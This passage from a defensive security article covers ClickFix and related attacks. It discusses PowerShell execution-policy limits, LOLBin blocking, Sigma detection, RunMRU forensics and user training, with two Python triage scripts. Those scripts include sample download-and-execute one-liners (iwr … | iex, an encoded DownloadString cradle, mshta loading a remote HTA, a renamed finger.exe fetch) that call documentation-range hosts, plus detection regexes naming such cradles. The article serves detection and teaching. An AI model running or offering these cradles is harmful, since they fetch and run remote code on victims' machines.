There is a widely circulated and legitimate objection to recommending ExecutionPolicy as a ClickFix defense. Microsoft's own documentation states explicitly: “The execution policy isn't a security system that restricts user actions. For example, users can easily bypass a policy by typing the script contents at the command line when they cannot run a script.” Two facts follow for ClickFix in particular. First, the execution policy governs script files (.ps1) and profiles only. A ClickFix one-liner is passed to powershell.exe with -Command or -EncodedCommand and typically fetches its next stage with Invoke-Expression; none of that is a script file, so the policy never applies to it at all. Second, the policy exists at several scopes, and the -ExecutionPolicy Bypass flag that ClickFix payloads routinely include sets only the Process scope. A policy pushed by Group Policy lands in the MachinePolicy scope, which takes precedence over Process, CurrentUser and LocalMachine, so the flag cannot override it, and changing it requires rights over the GPO that standard users do not have. So why does the CIS advisory still recommend it, and why is it included here? Because a Group Policy-enforced AllSigned or Restricted policy does close the follow-on path in which a dropped .ps1 file is executed, and because it is presented as one layer in a stack that also includes AppLocker, WDAC, and UAC hardening; the control that stops the pasted command itself is AppLocker or WDAC acting on powershell.exe. A locally set execution policy is trivially bypassable. A MachinePolicy-enforced one is a real obstacle to script-file execution, but it is not a security boundary and it does nothing against the in-memory download cradle a ClickFix command uses. Readers who see this recommendation elsewhere without those caveats are right to question it. With Group Policy enforcement and the full defensive stack, it remains a useful layer. On its own, it is not sufficient.

Beyond PowerShell hardening, block execution of commonly abused Living-off-the-Land Binaries (LOLBins) for standard users. mshta.exe, which executes HTML Applications (.hta files) and will load one directly from a URL, is a core component of ClickFix and FileFix delivery chains; few business users need it, so blocking it with AppLocker or WDAC, or removing it from endpoints with no HTA dependency, eliminates one of the more dangerous execution paths. Microsoft specifically recommended restricting outbound access for the finger utility (TCP port 79) following the CrashFix campaign, in which finger.exe was abused to retrieve attacker payloads; because CrashFix copies the binary under a new name, detections should match on the PE OriginalFileName, which a file copy does not change, rather than on the path. Restricting the installation of browser extensions to an approved list prevents CrashFix-style attacks delivered through malicious browser extensions.

For SIEM platforms, detection engineers including Florian Roth of Nextron Systems have published Sigma rules specifically targeting ClickFix behavior patterns: explorer.exe spawning mshta.exe, PowerShell processes initiated from unusual parent processes, and Base64-encoded commands passed to powershell.exe via the Run dialog. Two details matter when writing or tuning these rules. The Run dialog produces no event of its own; in process-creation telemetry (Sysmon Event ID 1, Windows Security event 4688) it appears as explorer.exe being the parent of powershell.exe, cmd.exe or mshta.exe, with the pasted text as the full command line, so the parent-child pair plus the command line is the signal, and command-line auditing must be enabled for 4688 to carry it at all. And the -EncodedCommand argument is Base64 of UTF-16LE text, not of ASCII, so a decoder that assumes UTF-8 will produce garbage and miss keyword matches. Enable PowerShell logging at all three levels, Script Block, Module and Transcript, to capture what actually executes once the cradle has downloaded its next stage. Monitor DNS for nslookup commands executed from user-initiated processes targeting external DNS servers, as documented DNS-based ClickFix variants use DNS as a staging channel.
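The parent-child and command-line checks described above, run over a handful of constructed process-creation events. This is an added example written for this page, not code from the article, from Microsoft, or from any published Sigma rule set. The field names follow Sysmon Event ID 1 (Image, OriginalFileName, ParentImage, CommandLine), the sample events and the RFC 5737 documentation-range IP addresses are constructed, and the finding names are the example's own. It goes slightly beyond the text in one respect: it also catches the CrashFix finger.exe rename by comparing the PE OriginalFileName with the on-disk name.

```python
"""Rule-based triage of process-creation events for ClickFix-style chains.

Added example: not code from the article, Microsoft, Huntress or any Sigma
rule set. Field names mirror Sysmon Event ID 1; the events below are
constructed, and the IP addresses are RFC 5737 documentation ranges.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# The Run dialog (Win+R) has no event of its own; it shows up as explorer.exe
# being the parent of whatever the user launched.
RUN_TARGETS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# LOLBins worth checking for renames. Copying finger.exe to %TEMP%\ct.exe (as in
# CrashFix) changes the file name but not the PE header's OriginalFileName.
WATCHED_LOLBINS = {"finger.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"}

# Download-and-execute cradles typical of a pasted one-liner.
CRADLE = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|"
    r"downloadstring|frombase64string)\b", re.IGNORECASE)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass\b", re.IGNORECASE)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)


@dataclass
class Event:
    label: str
    image: str               # path of the new process
    original_file_name: str  # PE OriginalFileName as logged by Sysmon
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries Base64 of UTF-16LE text, not of ASCII/UTF-8."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(ev: Event) -> list[str]:
    findings: list[str] = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    orig = ev.original_file_name.lower()
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("encoded-command")
        text = f"{text} {decoded}"  # inspect the decoded payload as well

    if parent == "explorer.exe" and img in RUN_TARGETS:
        findings.append("run-dialog-launch")
    if img in {"powershell.exe", "pwsh.exe"}:
        if BYPASS.search(text):
            findings.append("executionpolicy-bypass-flag")
        if HIDDEN.search(text):
            findings.append("hidden-window")
        if CRADLE.search(text):
            findings.append("download-cradle")
    if img == "mshta.exe" and re.search(r"https?://", text, re.IGNORECASE):
        findings.append("mshta-remote-hta")
    if orig in WATCHED_LOLBINS and orig != img:
        findings.append(f"renamed-lolbin:{orig}->{img}")
    if orig == "finger.exe" and "@" in text:  # finger user@host = outbound TCP/79
        findings.append("finger-outbound")
    return findings


def triage(events: list[Event]) -> dict[str, list[str]]:
    return {ev.label: analyse(ev) for ev in events}


def _encoded(ps: str) -> str:
    """Encode a command the way an attacker would for -EncodedCommand."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLES = [  # constructed events, not real telemetry
    Event("run_dialog_clickfix", PS, "PowerShell.EXE", r"C:\Windows\explorer.exe",
          'powershell.exe -w hidden -ep bypass -c "iwr http://198.51.100.7/v | iex"'),
    Event("run_dialog_encoded", PS, "PowerShell.EXE", r"C:\Windows\explorer.exe",
          "powershell.exe -NoP -NonI -EncodedCommand " + _encoded(
              "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s')")),
    Event("run_dialog_mshta", r"C:\Windows\System32\mshta.exe", "MSHTA.EXE",
          r"C:\Windows\explorer.exe", "mshta https://203.0.113.5/check.hta"),
    Event("crashfix_renamed_finger", r"C:\Users\alice\AppData\Local\Temp\ct.exe", "finger.exe",
          PS, "ct.exe alice@192.0.2.45"),
    Event("benign_scheduled_task", PS, "PowerShell.EXE", r"C:\Windows\System32\svchost.exe",
          r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    Event("benign_run_dialog", r"C:\Windows\System32\notepad.exe", "NOTEPAD.EXE",
          r"C:\Windows\explorer.exe", "notepad"),
]

if __name__ == "__main__":
    for label, hits in triage(SAMPLES).items():
        print(f"{label:26} {hits or 'clean'}")
```

In production the same conditions live in Sigma or EDR rules; the point of spelling them out is that each one (explorer.exe parent, hidden-window and bypass flags, a download cradle, possibly hidden inside an -EncodedCommand blob) is individually weak, while the combination almost never occurs in normal business use, and the benign scheduled-task and notepad events come out clean.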

Darktrace, in a June 2025 case study, demonstrated how anomaly-based detection could identify ClickFix activity after initial access by detecting unusual PowerShell user agents, unexpected external communications, and data exfiltration patterns—even when the initial compromise occurred outside the organization's direct visibility.

ClickFix defense — layered controls by category

PowerShell hardening
- Set ExecutionPolicy to AllSigned or Restricted via Group Policy at MachinePolicy scope (governs .ps1 files only; the -ExecutionPolicy Bypass flag cannot override it, but a -Command one-liner is never subject to it)
- Use AppLocker or SRP to block powershell.exe and pwsh.exe for non-admin users entirely
- Deploy WDAC code integrity policies; an enforced policy also forces PowerShell into Constrained Language Mode
- Enable Script Block, Module, and Transcript logging (all three levels)

LOLBin blocking
- Block mshta.exe for standard users: core ClickFix and FileFix delivery component
- Restrict outbound access for finger.exe (TCP port 79): abused in CrashFix for payload retrieval
- Monitor for LOLBin renaming (e.g. finger.exe copied to %TEMP%\ct.exe); match on the PE OriginalFileName, not the file name

SIEM / detection
- Deploy Sigma rules: explorer.exe spawning mshta.exe, Base64 args to powershell.exe (decode as UTF-16LE)
- Alert on explorer.exe spawning powershell.exe or cmd.exe with a pasted command line, the Run dialog's footprint in process telemetry: anomalous for standard users
- Monitor nslookup from user-initiated processes to external DNS: DNS staging channel indicator
- Monitor clipboard-to-terminal behavioral sequences in EDR telemetry

Browser & identity
- Restrict extension installation to approved lists: prevents CrashFix-style malicious extension attacks
- Enforce UAC credential prompting on the secure desktop so elevation requires admin credentials (governs elevation only; pair with AppLocker)
- Review OAuth app consent policies: ConsentFix abuses Azure CLI OAuth to skip MFA entirely
- Use URL filtering and domain reputation controls against ClickFix landing page infrastructure

User awareness
- Train users: no legitimate service will ever ask them to open Run or Terminal and paste a command
- Extend training to cover browser crashes: CrashFix exploits real technical problems, not just fake ones
- Crypto users specifically: no real arbitrage exploit is shared on Pastebin
- Treat social media and messaging-delivered "fixes" with the same skepticism as phishing links

The core problem

Technical controls alone are insufficient. The defining challenge of ClickFix is that the victim is an active participant in their own compromise. The browser sees a legitimate clipboard event. The EDR sees the user opening PowerShell. Neither triggers an alert in isolation. This makes user awareness training more critical than ever, with a specific emphasis that legitimate websites, software updates, and verification processes will never require users to open a system terminal and paste commands they do not understand.
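When neither control fires in real time, the first incident-response question is what the user actually pasted. The Run dialog keeps its own history in the registry, under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and that key is often the quickest answer. The following is an added example written for this page, not code from the article or from any forensic tool. The registry values are constructed (on a live host you would read them with winreg or from a reg export), the IP address is a documentation-range address, and the trailing comment on the pasted line mirrors a common lure style, in which the command ends with CAPTCHA-looking text so that the visible tail of the Run box reads as a verification receipt rather than a command.

```python
r"""Triage of the Run dialog's own history (RunMRU) after a suspected ClickFix.

Added example, not from the article or any vendor tooling. Windows keeps the
last commands typed into Win+R under
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: one string
value per entry, named a, b, c, ..., each ending in the literal two characters
"\1", plus an MRUList value whose letters give the order, most recent first.
The values below are constructed; the IP is a documentation-range address.
"""
import re

RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Things a business user does not type into Win+R: an interpreter plus a fetch.
INTERPRETERS = re.compile(
    r"^(powershell|pwsh|cmd|mshta|wscript|cscript|curl|msiexec)\b", re.IGNORECASE)
FETCH = re.compile(
    r"(https?://|\biex\b|invoke-expression|downloadstring|\birm\b|\biwr\b|-enc)",
    re.IGNORECASE)
# Lures often append a comment so the visible end of the Run box looks benign.
TRAILING_COMMENT = re.compile(r"\s+(#|::|rem\b).*$", re.IGNORECASE)


def parse_runmru(values: dict) -> list:
    """Return the Run history in MRU order (most recent first), '\\1' stripped."""
    history = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def assess(entry: str) -> dict:
    cmd = TRAILING_COMMENT.sub("", entry)
    disguised = cmd != entry                      # comment padding was present
    interp = bool(INTERPRETERS.search(cmd))
    fetch = bool(FETCH.search(cmd))
    return {"command": cmd, "disguised": disguised,
            "suspicious": interp and (fetch or disguised)}


def triage_runmru(values: dict) -> list:
    return [dict(rank=i, entry=e, **assess(e))
            for i, e in enumerate(parse_runmru(values))]


# Constructed RunMRU export from a host where the user pasted a lure, then
# later ran an ordinary UNC path; MRUList "bdca" means b is the most recent.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr http://198.51.100.7/v | iex"'
         "  # I am not a robot - reCAPTCHA Verification ID: 7811\\1",
    "c": "calc\\1",
    "d": r"\\fileserver\share\1",
    "MRUList": "bdca",
}

if __name__ == "__main__":
    print(f"Run history from {RUNMRU_KEY}:")
    for row in triage_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if row["suspicious"] else "ok"
        print(f"  {row['rank']}: {flag:10} {row['command']}")
```

The suspicious verdict is deliberately narrow: an interpreter name at the start of the line combined with either a fetch keyword or comment padding. Administrators do type powershell into Win+R, so the interpreter alone is not enough, and a UNC path or calc should come out clean. Check RunMRU alongside the PowerShell transcript and the 4688 or Sysmon process events, since the key is per user and only records what was launched from the Run dialog, not from the File Explorer address bar used by FileFix.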

The CrashFix variant adds an important dimension to user training: attackers are now willing to create real technical problems to make their fake fixes more convincing. A browser that has genuinely crashed is more persuasive than a fake error message. Users and security teams should treat any prompt to run a command—even one that appears in response to a real system problem—with the same skepticism applied to phishing lures.

If a webpage, browser extension notification, or any on-screen prompt asks you to open Run, Terminal, or a browser console and paste a command, close it and report it. This principle should be reinforced in security awareness training with the same emphasis given to phishing link identification. Microsoft specifically recommends training users that pasting commands or launching remote tools on request is as risky as clicking suspicious links.

For cryptocurrency users specifically, the Pastebin crypto swap variant carries a clear lesson: if someone is sharing an exploit that supposedly generates free money, you are the mark. No legitimate vulnerability would be broadcast on Pastebin. Arbitrage discrepancies of 37% do not exist undetected. And manually typing javascript: into your browser's address bar to run untrusted code is handing your wallet to a stranger.

What Comes Next

ClickFix represents a fundamental shift in attacker methodology. Rather than fighting endpoint security tools head-on, attackers have found it more efficient to recruit users as unwitting accomplices. The technique's growth trajectory, from a niche tactic in early 2024 to the number one initial access method in Microsoft Defender Experts data by the time of Microsoft's October 2025 Digital Defense Report, its adoption by nation-state groups across three countries within a single quarter, the emergence of commercial builders and automation tools like ErrTraffic, and the proliferation of variants from FileFix to CrashFix all indicate a threat still in its expansion phase.

Recorded Future's Insikt Group, in its March 2026 assessment, predicts that future ClickFix iterations will incorporate more granular browser fingerprinting to conditionally serve payloads based on a victim's hardware profile, geographic location, or organizational membership. Infrastructure will continue to be built and dismantled quickly, staying ahead of blocklists. The social engineering component will continue to evolve, seeking new pretexts—tax season, travel bookings, AI tools, browser security alerts—that exploit context-specific trust. The Recorded Future analysis assessed with high confidence that ClickFix will remain a heavily used initial access vector throughout 2026.

The proliferation of ClickFix also reflects a broader trend visible in the Chainalysis data: cybercrime and fraud have both shifted away from purely technical exploits toward deception sophisticated enough to bypass human skepticism. Scams now rely on something harder to patch than a vulnerable smart contract or a misconfigured server: human trust in familiar interfaces.

As long as people can be convinced to paste a command they do not understand into a prompt they should not have opened, ClickFix and its descendants will continue to find victims. The defense starts with a single principle that needs to become as automatic as looking both ways before crossing the road: no legitimate service, update, verification system, or troubleshooter will ever ask you to fix a problem by running a command you copied from a webpage. If it does, the only thing that needs fixing is your browser tab—close it.

Sources

Proofpoint, “Around the World in 90 Days: State-Sponsored Actors Try ClickFix” (April 17, 2025)
Proofpoint, “From Clipboard to Compromise: A PowerShell Self-Pwn” (2024)
ESET, H1 2025 Threat Report (June 26, 2025)
Infosecurity Magazine, “ClickFix Attacks Surge 517% in 2025” (June 26, 2025)
Microsoft Security Blog, “Think Before You Click(Fix): Analyzing the ClickFix Social Engineering Technique” (August 21, 2025)
Microsoft Security Blog, “New ClickFix Variant CrashFix Deploying Python Remote Access Trojan” (February 5, 2026)
Microsoft, Digital Defense Report 2025 (October 2025)
Center for Internet Security, “ClickFix: An Adaptive Social Engineering Technique” (October 2025)
BleepingComputer, “Pastebin comments push ClickFix JavaScript attack to hijack crypto swaps” (February 2026)
BleepingComputer, “Fake ad blocker extension crashes the browser for ClickFix attacks” (January 19, 2026)
BeyondMachines, “Cryptocurrency theft through a program that victims need to run” (2025)
Chainalysis, 2026 Crypto Crime Report (January 2026)
Check Point Research, “FileFix: The New Social Engineering Attack Building on ClickFix Tested in the Wild” (July 2025)
Darktrace, “Unpacking ClickFix: Detection Insights” (June 2025)
Sekoia, “ClickFix Tactic: The Phantom Meet” (October 2024)
Sekoia, “From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic” (March 2025)
BleepingComputer, “Claude LLM artifacts abused to push Mac infostealers in ClickFix attack” (February 2026)
CloudSEK, “AMOS Variant Distributed Via ClickFix in Spectrum-Themed Dynamic Delivery Campaign” (August 2025)
Google Mandiant, “UNC1069 macOS Malware Campaign” (February 2026)
Huntress, “Dissecting CrashFix: KongTuke’s New Toy” (January 2026)
BleepingComputer, “ConsentFix variant abuses Azure CLI OAuth” (2025)
Hudson Rock, “The Industrialization of ClickFix: Inside ErrTraffic” (December 2025)
CISA/FBI/HHS/MS-ISAC, “#StopRansomware: Interlock” AA25-203A (July 2025)
ReliaQuest, drive-by compromise analysis (June 2025)
Recorded Future Insikt Group, “ClickFix Campaigns Targeting Windows and macOS” (March 2026)
The Hacker News, “CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures” (February 6, 2026)